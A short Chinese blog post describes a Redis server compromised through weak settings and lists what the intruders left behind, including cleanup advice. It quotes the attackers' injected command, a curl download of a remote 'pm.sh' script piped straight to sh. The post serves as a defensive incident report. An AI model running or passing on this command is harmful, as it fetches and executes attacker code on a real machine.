redis被攻击

之前由于redis没有修改端口,密码也比较简单,也没有绑定ip 结果被攻击了

1 redis里被写入string类型的脚本,比如:Back1 Back2 Back3 Back4 ,内容curl -fsSL http://d.powerofwish.com/pm.sh | sh的形式,如下图:

redis被攻击_第1张图片

这个pm.sh脚本被放在被上传工具文件里

2 /www/server/redis下多了一个root文件 具体文件放在被上传工具文件里

redis被攻击_第2张图片

3 去把主库的rdb文件和aof文件删下防止用这个数据恢复。

我的在appendonly.aof文件里看到了以下命令

redis被攻击_第3张图片

你可能感兴趣的:(redis,数据库,缓存)